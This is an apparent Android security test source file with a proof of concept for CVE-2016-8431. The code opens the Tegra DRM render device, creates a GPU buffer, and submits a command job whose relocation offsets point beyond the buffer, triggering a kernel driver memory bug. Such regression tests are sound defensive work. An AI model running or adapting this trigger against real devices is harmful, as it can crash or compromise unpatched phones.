Home | History | Annotate | Download | only in CVE-2016-8431 
      1 /*
      2  * Copyright (C) 2017 The Android Open Source Project
      3  *
      4  * Licensed under the Apache License, Version 2.0 (the "License");
      5  * you may not use this file except in compliance with the License.
      6  * You may obtain a copy of the License at
      7  *
      8  *      http://www.apache.org/licenses/LICENSE-2.0
      9  *
     10  * Unless required by applicable law or agreed to in writing, software
     11  * distributed under the License is distributed on an "AS IS" BASIS,
     12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
     13  * See the License for the specific language governing permissions and
     14  * limitations under the License.
     15  */
     16 #define _GNU_SOURCE
     17 #include <unistd.h>
     18 #include <stdio.h>
     19 #include <errno.h>
     20 #include <fcntl.h>
     21 #include <sys/ioctl.h>
     22 
     23 #include "local_poc.h"
     24 
     25 #define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
     26 #define ERR(fmt, ...) printf(fmt " %d %s\n", ##__VA_ARGS__, errno, strerror(errno))
     27 
     28 #define DEV "/dev/dri/renderD129"
     29 #define CMD_NUM		1
     30 
     31 int dev_fd;
     32 
     33 volatile struct drm_tegra_open_channel	open_c;
     34 volatile struct drm_tegra_submit		submit_c;
     35 volatile struct drm_tegra_gem_create	gem_create;
     36 
     37 struct drm_tegra_cmdbuf		cmdbufs[CMD_NUM];
     38 struct drm_tegra_syncpt		syncpt;
     39 struct drm_tegra_reloc		relocs[CMD_NUM];
     40 
     41 static int prepare()
     42 {
     43 	open_c.client = HOST1X_CLASS_VIC;
     44 	submit_c.num_syncpts = 1;
     45 	submit_c.syncpts = (__u64)&syncpt;
     46 	submit_c.num_cmdbufs = CMD_NUM;
     47 	submit_c.cmdbufs = (__u64)cmdbufs;
     48 	submit_c.num_relocs = CMD_NUM;
     49 	submit_c.relocs = (__u64)relocs;
     50 	gem_create.size = PAGE_SIZE;
     51 	return 0;
     52 }
     53 
     54 int main()
     55 {
     56 	int ret;
     57 	int i;
     58 
     59 	dev_fd = open(DEV,O_RDONLY);
     60 	if(dev_fd == -1){
     61 		return 0;
     62 	}
     63 
     64 	prepare();
     65 
     66 	ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
     67 	if(ret == -1){
     68 		goto out_dev;
     69 	}
     70 
     71 	submit_c.context = open_c.context;
     72 
     73 	ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_GEM_CREATE, &gem_create);
     74 	if(ret == 0){
     75 		for(i = 0; i < CMD_NUM; i++){
     76 			cmdbufs[i].words = 0;
     77 			cmdbufs[i].offset = 0;
     78 			cmdbufs[i].handle = gem_create.handle;
     79 			relocs[i].cmdbuf.handle = gem_create.handle;
     80 			relocs[i].cmdbuf.offset = 8192;
     81 			relocs[i].target.handle = gem_create.handle;
     82 			relocs[i].target.offset = 8192;
     83 		}
     84 		ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
     85 	}else{
     86 	}
     87 
     88 out_dev:
     89 	close(dev_fd);
     90 	return 0;
     91 }
     92